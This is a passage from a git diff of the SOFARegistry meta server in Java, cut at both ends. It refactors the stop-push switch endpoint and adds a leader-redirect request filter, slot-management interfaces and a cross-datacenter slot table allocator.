com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.store.api.DBService; -import com.alipay.sofa.registry.store.api.annotation.RaftReference; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - +import com.alipay.sofa.registry.server.meta.provide.data.DefaultProvideDataNotifier; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.server.meta.resource.filter.LeaderAwareRestController; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Sets; +import java.util.Set; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.core.MediaType; +import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: StopPushDataResource.java, v 0.1 2018-07-25 11:40 shangyu.wh Exp $ */ @Path("stopPushDataSwitch") +@LeaderAwareRestController public class StopPushDataResource { - private static final Logger DB_LOGGER = LoggerFactory.getLogger(StopPushDataResource.class, - "[DBService]"); - - private static final Logger TASK_LOGGER = LoggerFactory.getLogger(StopPushDataResource.class, - "[Task]"); - - @RaftReference - private DBService persistenceDataDBService; - - @Autowired - private TaskListenerManager taskListenerManager; - - /** - * close push - */ - @GET - @Path("open") - @Produces(MediaType.APPLICATION_JSON) - public Result closePush() { - PersistenceData persistenceData = createPushDataInfo(); - persistenceData.setData("true"); - - try { - boolean ret = persistenceDataDBService.put( - ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID, persistenceData); - DB_LOGGER.info("open stop push data switch to DB result {}!", ret); - } catch (Exception e) { - DB_LOGGER.error("error open stop push data switch to DB!"); - throw new RuntimeException("open stop push data switch to DB error!"); - } - - fireDataChangeNotify(persistenceData.getVersion(), - ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID, DataOperator.ADD); - - Result result = new Result(); - result.setSuccess(true); - return result; + private static final Logger DB_LOGGER = + LoggerFactory.getLogger(StopPushDataResource.class, "[DBService]"); + + private static final Logger TASK_LOGGER = + LoggerFactory.getLogger(StopPushDataResource.class, "[Task]"); + + @Autowired private ProvideDataService provideDataService; + + @Autowired private DefaultProvideDataNotifier provideDataNotifier; + + /** close push */ + @GET + @Path("open") + @Produces(MediaType.APPLICATION_JSON) + public Result closePush() { + PersistenceData persistenceData = + PersistenceDataBuilder.createPersistenceData( + ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID, "true"); + + boolean ret; + try { + ret = provideDataService.saveProvideData(persistenceData); + DB_LOGGER.info("open stop push data switch to DB result {}!", ret); + } catch (Throwable e) { + DB_LOGGER.error("error open stop push data switch to DB!", e); + throw new RuntimeException("open stop push data switch to DB error!", e); } - /** - * open push - */ - @GET - @Path("close") - @Produces(MediaType.APPLICATION_JSON) - public Result openPush() { - PersistenceData persistenceData = createPushDataInfo(); - persistenceData.setData("false"); - try { - boolean ret = persistenceDataDBService.update( - ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID, persistenceData); - DB_LOGGER.info("close stop push data switch to DB result {}!", ret); - } catch (Exception e) { - DB_LOGGER.error("error close stop push data switch from DB!"); - throw new RuntimeException("Close stop push data switch from DB error!"); - } - - fireDataChangeNotify(persistenceData.getVersion(), - ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID, DataOperator.UPDATE); - - Result result = new Result(); - result.setSuccess(true); - return result; + if (ret) { + fireDataChangeNotify( + persistenceData.getVersion(), ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID); } - private PersistenceData createPushDataInfo() { - DataInfo dataInfo = DataInfo.valueOf(ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID); - PersistenceData persistenceData = new PersistenceData(); - persistenceData.setDataId(dataInfo.getDataId()); - persistenceData.setGroup(dataInfo.getDataType()); - persistenceData.setInstanceId(dataInfo.getInstanceId()); - persistenceData.setVersion(System.currentTimeMillis()); - return persistenceData; + Result result = new Result(); + result.setSuccess(ret); + return result; + } + + /** open push */ + @GET + @Path("close") + @Produces(MediaType.APPLICATION_JSON) + public Result openPush() { + PersistenceData persistenceData = + PersistenceDataBuilder.createPersistenceData( + ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID, "false"); + persistenceData.setData("false"); + + boolean ret; + try { + ret = provideDataService.saveProvideData(persistenceData); + DB_LOGGER.info("close stop push data switch to DB result {}!", ret); + } catch (Exception e) { + DB_LOGGER.error("error close stop push data switch from DB!"); + throw new RuntimeException("Close stop push data switch from DB error!"); } - private void fireDataChangeNotify(Long version, String dataInfoId, DataOperator dataOperator) { + if (ret) { + fireDataChangeNotify( + persistenceData.getVersion(), ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID); + } - NotifyProvideDataChange notifyProvideDataChange = new NotifyProvideDataChange(dataInfoId, - version, dataOperator); + Result result = new Result(); + result.setSuccess(ret); + return result; + } - TaskEvent taskEvent = new TaskEvent(notifyProvideDataChange, - TaskType.PERSISTENCE_DATA_CHANGE_NOTIFY_TASK); - TASK_LOGGER.info("send PERSISTENCE_DATA_CHANGE_NOTIFY_TASK notifyProvideDataChange:" - + notifyProvideDataChange); - taskListenerManager.sendTaskEvent(taskEvent); - } + private void fireDataChangeNotify(Long version, String dataInfoId) { -} \ No newline at end of file + ProvideDataChangeEvent provideDataChangeEvent = + new ProvideDataChangeEvent(dataInfoId, version, getNodeTypes()); + if (TASK_LOGGER.isInfoEnabled()) { + TASK_LOGGER.info( + "send PERSISTENCE_DATA_CHANGE_NOTIFY_TASK notifyProvideDataChange: {}", + provideDataChangeEvent); + } + provideDataNotifier.notifyProvideDataChange(provideDataChangeEvent); + } + + protected Set getNodeTypes() { + return Sets.newHashSet(NodeType.SESSION); + } + + @VisibleForTesting + protected StopPushDataResource setProvideDataService(ProvideDataService provideDataService) { + this.provideDataService = provideDataService; + return this; + } + + @VisibleForTesting + protected StopPushDataResource setProvideDataNotifier( + DefaultProvideDataNotifier provideDataNotifier) { + this.provideDataNotifier = provideDataNotifier; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/filter/LeaderAwareFilter.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/filter/LeaderAwareFilter.java new file mode 100644 index 000000000..fd8b8e4ac --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/filter/LeaderAwareFilter.java @@ -0,0 +1,106 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource.filter; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.google.common.annotations.VisibleForTesting; +import java.io.IOException; +import java.net.URI; +import javax.annotation.Priority; +import javax.ws.rs.Priorities; +import javax.ws.rs.container.ContainerRequestContext; +import javax.ws.rs.container.ContainerRequestFilter; +import javax.ws.rs.core.Response; +import javax.ws.rs.ext.Provider; +import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Mar 17, 2021 + */ +@Provider +@LeaderAwareRestController +@Priority(Priorities.USER) +public class LeaderAwareFilter implements ContainerRequestFilter { + + private static final Logger LOGGER = LoggerFactory.getLogger(LeaderAwareFilter.class); + + @Autowired private MetaLeaderService metaLeaderService; + + @Autowired private MetaServerConfig metaServerConfig; + + @Override + public void filter(ContainerRequestContext context) throws IOException { + if (!metaLeaderService.amILeader()) { + Response response; + String leaderIp = metaLeaderService.getLeader(); + if (StringUtils.isEmpty(leaderIp)) { + response = + Response.status(Response.Status.BAD_REQUEST) + .header("reason", "no leader found") + .build(); + } else { + try { + LOGGER.warn( + "[filter]request: [{}][{}] need to redirect to {}", + getRemoteIP(context), + context.getMethod(), + leaderIp); + response = + Response.temporaryRedirect( + new URI( + "http://" + + leaderIp + + ":" + + metaServerConfig.getHttpServerPort() + + "/" + + context.getUriInfo().getPath())) + .build(); + } catch (Throwable e) { + LOGGER.error("[filter]", e); + response = Response.status(Response.Status.INTERNAL_SERVER_ERROR).build(); + } + } + context.abortWith(response); + } + } + + public String getRemoteIP(ContainerRequestContext context) { + String remote = context.getHeaderString("x-forwarded-for"); + if (StringUtils.isNotBlank(remote)) { + return remote; + } + return "unknown"; + } + + public LeaderAwareFilter() {} + + public LeaderAwareFilter(MetaLeaderService metaLeaderService, MetaServerConfig metaServerConfig) { + this.metaLeaderService = metaLeaderService; + this.metaServerConfig = metaServerConfig; + } + + @VisibleForTesting + protected LeaderAwareFilter setMetaLeaderService(MetaLeaderService metaLeaderService) { + this.metaLeaderService = metaLeaderService; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/filter/LeaderAwareRestController.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/filter/LeaderAwareRestController.java new file mode 100644 index 000000000..ee7e33334 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/filter/LeaderAwareRestController.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource.filter; + +import java.lang.annotation.ElementType; +import java.lang.annotation.Retention; +import java.lang.annotation.RetentionPolicy; +import java.lang.annotation.Target; +import javax.ws.rs.NameBinding; + +@NameBinding // 标识名称绑定的注解 +@Target({ElementType.TYPE, ElementType.METHOD}) // 表示该注解可以使用在类和方法上。 +@Retention(value = RetentionPolicy.RUNTIME) +public @interface LeaderAwareRestController {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/revision/AppRevisionHeartbeatService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/revision/AppRevisionHeartbeatService.java new file mode 100644 index 000000000..ea2ca7003 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/revision/AppRevisionHeartbeatService.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.revision; + +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.store.api.repository.AppRevisionHeartbeatRepository; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionHeartbeatService.java, v 0.1 2021年04月15日 17:52 xiaojian.xj Exp $ + */ +public class AppRevisionHeartbeatService { + + @Autowired private AppRevisionHeartbeatRepository appRevisionHeartbeatRepository; + + @Autowired private MetaServerConfig metaServerConfig; + + @Autowired private MetaLeaderService metaLeaderService; + + public void doRevisionGc() { + if (metaLeaderService.amIStableAsLeader()) { + appRevisionHeartbeatRepository.doAppRevisionGc(metaServerConfig.getRevisionGcSilenceHour()); + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/RebalanceTask.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/RebalanceTask.java new file mode 100644 index 000000000..de8f6038d --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/RebalanceTask.java @@ -0,0 +1,23 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot; + +/** + * @author chen.zhu + *

Nov 25, 2020 + */ +public interface RebalanceTask extends Runnable {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotAllocator.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotAllocator.java new file mode 100644 index 000000000..a348094d3 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotAllocator.java @@ -0,0 +1,27 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot; + +import com.alipay.sofa.registry.common.model.slot.SlotTable; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-11 11:31 yuzhi.lyz Exp $ + */ +public interface SlotAllocator { + SlotTable getSlotTable(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotAssigner.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotAssigner.java new file mode 100644 index 000000000..d9a9ca98f --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotAssigner.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot; + +import com.alipay.sofa.registry.common.model.slot.SlotTable; + +/** + * @author chen.zhu + *

Jan 15, 2021 + */ +public interface SlotAssigner { + + SlotTable assign(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotBalancer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotBalancer.java new file mode 100644 index 000000000..ba24fa774 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotBalancer.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot; + +import com.alipay.sofa.registry.common.model.slot.SlotTable; + +/** + * @author chen.zhu + *

Jan 15, 2021 + */ +public interface SlotBalancer { + + SlotTable balance(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotManager.java new file mode 100644 index 000000000..f1040330f --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotManager.java @@ -0,0 +1,58 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot; + +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.observer.Observable; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface SlotManager extends SlotTableAware, Observable { + + /** + * Refresh. + * + * @param slotTable the slot table + */ + boolean refresh(SlotTable slotTable); + + /** + * Gets get slot nums. + * + * @return the get slot nums + */ + int getSlotNums(); + + /** + * Gets get slot replica nums. + * + * @return the get slot replica nums + */ + int getSlotReplicaNums(); + + /** + * Gets get data node managed slot. + * + * @param dataNode the data node + * @param ignoreFollowers the ignore followers + * @return the get data node managed slot + */ + DataNodeSlot getDataNodeManagedSlot(String dataNode, boolean ignoreFollowers); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotTableAware.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotTableAware.java new file mode 100644 index 000000000..19061ba08 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/SlotTableAware.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot; + +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.store.api.annotation.ReadOnLeader; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface SlotTableAware { + + /** + * Gets get slot table. + * + * @return the get slot table + */ + @ReadOnLeader + SlotTable getSlotTable(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/arrange/CrossDcSlotAllocator.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/arrange/CrossDcSlotAllocator.java new file mode 100644 index 000000000..2d5faac65 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/arrange/CrossDcSlotAllocator.java @@ -0,0 +1,243 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.arrange; + +import com.alipay.sofa.registry.common.model.metaserver.GetSlotTableRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.datacenter.DataCenterAware; +import com.alipay.sofa.registry.exception.DisposeException; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.exception.StartException; +import com.alipay.sofa.registry.exception.StopException; +import com.alipay.sofa.registry.lifecycle.impl.AbstractLifecycle; +import com.alipay.sofa.registry.remoting.CallbackHandler; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.metaserver.CrossDcMetaServer; +import com.alipay.sofa.registry.server.meta.slot.SlotAllocator; +import com.alipay.sofa.registry.server.meta.slot.SlotTableAware; +import com.google.common.annotations.VisibleForTesting; +import java.util.concurrent.Executor; +import java.util.concurrent.ScheduledExecutorService; +import java.util.concurrent.ScheduledFuture; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.concurrent.atomic.AtomicReference; +import java.util.concurrent.locks.ReadWriteLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; + +/** + * @author chen.zhu + *

Nov 20, 2020 + */ +public class CrossDcSlotAllocator extends AbstractLifecycle + implements SlotAllocator, DataCenterAware, SlotTableAware { + + private final String dcName; + + private final ScheduledExecutorService scheduled; + + private final CrossDcMetaServer metaServer; + + private volatile ScheduledFuture future; + + private final AtomicReference currentSlotTable = new AtomicReference<>(); + + private final Exchange exchange; + + private final MetaLeaderService metaLeaderService; + + private final AtomicInteger index = new AtomicInteger(0); + + private final ReadWriteLock lock = new ReentrantReadWriteLock(); + + /** + * Constructor. + * + * @param dcName the dc name + * @param scheduled the scheduled + * @param exchange the exchange + * @param metaServer the meta server + */ + public CrossDcSlotAllocator( + String dcName, + ScheduledExecutorService scheduled, + Exchange exchange, + CrossDcMetaServer metaServer, + MetaLeaderService metaLeaderService) { + this.dcName = dcName; + this.scheduled = scheduled; + this.exchange = exchange; + this.metaServer = metaServer; + this.metaLeaderService = metaLeaderService; + } + + /** + * Gets get slot table. + * + * @return the get slot table + */ + @Override + public SlotTable getSlotTable() { + if (!getLifecycleState().isStarted() && !getLifecycleState().isStarting()) { + throw new IllegalStateException("[RemoteDcSlotAllocator]not available not"); + } + return currentSlotTable.get(); + } + + /** + * Gets get dc. + * + * @return the get dc + */ + @Override + public String getDc() { + return dcName; + } + + @Override + protected void doInitialize() throws InitializeException { + super.doInitialize(); + } + + @Override + protected void doStart() throws StartException { + future = + scheduled.scheduleWithFixedDelay( + new Runnable() { + @Override + public void run() { + if (metaLeaderService.amIStableAsLeader()) { + refreshSlotTable(0); + } + } + }, + getIntervalMilli(), + getIntervalMilli(), + TimeUnit.MILLISECONDS); + } + + @Override + protected void doStop() throws StopException { + if (future != null) { + future.cancel(true); + future = null; + } + } + + @Override + protected void doDispose() throws DisposeException { + super.doDispose(); + } + + /** + * Sets slot table. + * + * @param slotTable the slot table + */ + public void setSlotTable(SlotTable slotTable) { + currentSlotTable.set(slotTable); + } + + @VisibleForTesting + protected long getIntervalMilli() { + return 60 * 1000; + } + + @VisibleForTesting + protected void refreshSlotTable(int retryTimes) { + if (retryTimes > 3) { + logger.warn("[refreshSlotTable]try timeout, more than {} times", 3); + return; + } + final long currentEpoch = + currentSlotTable.get() == null ? -1 : currentSlotTable.get().getEpoch(); + GetSlotTableRequest request = new GetSlotTableRequest(currentEpoch, null, false); + MetaNode metaNode = getRemoteMetaServer(); + exchange + .getClient(Exchange.META_SERVER_TYPE) + .sendCallback( + metaNode.getNodeUrl(), + request, + new CallbackHandler() { + @Override + @SuppressWarnings("unchecked") + public void onCallback(Channel channel, Object message) { + if (!(message instanceof SlotTable)) { + logger.error( + "[refreshSlotTable]wanted SlotTable, but receive: [{}]{}", + message.getClass(), + message); + return; + } + SlotTable slotTable = (SlotTable) message; + lock.writeLock().lock(); + try { + if (currentEpoch < slotTable.getEpoch()) { + if (logger.isWarnEnabled()) { + logger.warn( + "[refreshSlotTable] remote slot table changed, \n prev: {} \n change to: {}", + currentSlotTable.get(), + slotTable); + } + currentSlotTable.set(slotTable); + } + } finally { + lock.writeLock().unlock(); + } + } + + @Override + public void onException(Channel channel, Throwable exception) { + if (logger.isErrorEnabled()) { + logger.error( + "[refreshSlotTable][{}]Bolt Request Failure, remote: {}, will try other meta-server", + getDc(), + channel == null ? "unknown" : channel.getRemoteAddress().getHostName(), + exception); + } + index.set(index.incrementAndGet() % metaServer.getClusterMembers().size()); + // if failure, try again with another meta server. + // good luck with that. :) + refreshSlotTable(retryTimes + 1); + } + + @Override + public Executor getExecutor() { + return scheduled; + } + }, + 5000); + } + + private MetaNode getRemoteMetaServer() { + return metaServer.getClusterMembers().get(index.get()); + } + + @Override + public String toString() { + return "CrossDcSlotAllocator{" + + "dcName='" + + dcName + + '\'' + + ", metaServer=" + + metaServer + + '}'; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/arrange/ScheduledSlotArranger.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/arrange/ScheduledSlotArranger.java new file mode 100644 index 000000000..9c51cd63f --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/arrange/ScheduledSlotArranger.java @@ -0,0 +1,286 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.arrange; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.exception.DisposeException; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.exception.SofaRegistrySlotTableException; +import com.alipay.sofa.registry.lifecycle.Suspendable; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.impl.AbstractLifecycleObservable; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeAdded; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeRemoved; +import com.alipay.sofa.registry.server.meta.lease.data.DataManagerObserver; +import com.alipay.sofa.registry.server.meta.lease.data.DefaultDataServerManager; +import com.alipay.sofa.registry.server.meta.monitor.Metrics; +import com.alipay.sofa.registry.server.meta.monitor.SlotTableMonitor; +import com.alipay.sofa.registry.server.meta.slot.SlotAssigner; +import com.alipay.sofa.registry.server.meta.slot.SlotBalancer; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.server.meta.slot.assigner.DefaultSlotAssigner; +import com.alipay.sofa.registry.server.meta.slot.balance.DefaultSlotBalancer; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import com.alipay.sofa.registry.server.shared.comparator.NodeComparator; +import com.alipay.sofa.registry.server.shared.slot.SlotTableUtils; +import com.alipay.sofa.registry.server.shared.util.NodeUtils; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.JsonUtils; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import com.google.common.annotations.VisibleForTesting; +import java.util.Collection; +import java.util.List; +import java.util.concurrent.locks.Lock; +import java.util.concurrent.locks.ReentrantLock; +import javax.annotation.PostConstruct; +import javax.annotation.PreDestroy; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

